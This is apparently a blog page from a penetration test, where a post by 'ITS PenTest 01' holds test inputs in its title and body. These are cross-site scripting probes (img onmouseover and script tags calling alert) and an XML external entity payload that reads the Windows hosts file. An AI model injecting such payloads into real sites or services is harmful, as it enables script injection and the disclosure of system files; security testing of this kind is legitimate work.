View All Posts

May 10

<img src="x" onmouseover="alert('XSS_IN_BLOG_POST_NAME')">

Posted on May 10, 2024 at 6:21 am by ITS PenTest 01

<!--?xml version="1.0" ?-->
<!DOCTYPE foo [<!ENTITY example SYSTEM "C:\windows\system32\drivers\etc\hosts"> ]>
<data>&example;</data>

<u>Lets See</u>

If the Blog post is vulnerable to XSS

<img src=x onmouseover=alert('XSS_IN_BLOG_POST')>

<script>alert('XSS')</script>



Comments

You must log in before leaving your comment